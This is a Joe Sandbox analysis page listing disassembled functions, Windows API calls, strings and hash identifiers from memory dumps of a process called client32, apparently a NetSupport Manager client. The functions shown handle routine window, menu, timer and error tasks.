Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessTextWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2794799252-2830328467
Opcode ID: 7b51321ed4cf155098be2b01c90de1ffe2bacc69320345c416a57ae4b857326b
Instruction ID: 72bdda00d037fb97804bcb86ad2f4b1093ca87521072ab80336439e151a1efd7
Opcode Fuzzy Hash: 7b51321ed4cf155098be2b01c90de1ffe2bacc69320345c416a57ae4b857326b
Instruction Fuzzy Hash: 3CE0CDB55002197BD300DA41DC45ED7F39CEB55754F008036F82656600D670E940C7D4

Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100114B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001136
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390

Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8

Strings

AudioCapture.dll, xrefs: 1100D5F3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20

Function 11001B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ReleaseDC.USER32(?,?), ref: 11001BBB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001BA6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BA1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessReleasewsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3704029381-2830328467
Opcode ID: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
Instruction ID: e79f40fb120e4deef42ce200f9e6c9239afd2a6aa69c55604b67f0d5db68f33b
Opcode Fuzzy Hash: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
Instruction Fuzzy Hash: 69D02BB16003287BD300C641DC41ED6F3CCE709264F00403AF91552500E6B0E44083D0

Function 11001DA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 11001DCB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001DB6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001DB1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 543875238-2830328467
Opcode ID: a8436c23d1ae87190dbb1f7523b302e4618228c53e539b9dadab8596ce98ae6a
Instruction ID: 2646b4423abb4220ebaa6e76d3398d077ecb06387ccfcefc6bf5f676e13b9035
Opcode Fuzzy Hash: a8436c23d1ae87190dbb1f7523b302e4618228c53e539b9dadab8596ce98ae6a
Instruction Fuzzy Hash: 0FD02BB160032DBBC300D641EC41FD6F3CCE744258F004036F51656600D5B0E440C3E4

Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8

Strings

\\.\NSWFPDrv, xrefs: 11015592

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0

Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180

Strings

MSOfficeWClass, xrefs: 11113165

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC

Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1115F323
..\ctl32\wndclass.cpp, xrefs: 1115F31E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
String ID: ..\ctl32\wndclass.cpp$m_hWnd
API String ID: 1417657345-2201682149
Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681

Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D3B4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D3A3
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384

Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 1115B918
GetPropA.USER32(?,OldMenu), ref: 1115B928

Strings

OldMenu, xrefs: 1115B922

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9

Function 11001B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11001B84

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001B73
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001B6E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1426755417-2830328467
Opcode ID: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
Instruction ID: c965eeeb9282c2230bcc2d2e70a04aceb6947dc125d68a22ae0f57a9989a012e
